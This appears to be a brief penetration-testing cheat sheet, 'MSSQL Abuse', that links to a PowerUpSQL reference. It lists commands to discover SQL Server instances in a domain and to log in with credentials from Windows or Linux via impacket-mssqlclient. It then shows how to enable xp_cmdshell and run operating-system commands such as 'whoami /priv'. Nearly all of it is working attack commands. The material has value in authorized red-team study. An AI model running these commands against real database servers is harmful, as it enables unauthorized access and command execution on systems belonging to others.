Skip to content

MSSQL Abuse

Identify

https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet 

Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain
Connect - Windows 
Get-SQLQuery -Verbose -Instance "host,port" -username "domain.local\\user" -password "password" -query 'Select @@version'
Connect - Linux 
impacket-mssqlclient user:'pass'@<IP> -windows-auth

Exploit

Run commands with xp_cmdshell 

SQL> enable_xp_cmdshell
xp_cmdshell whoami /priv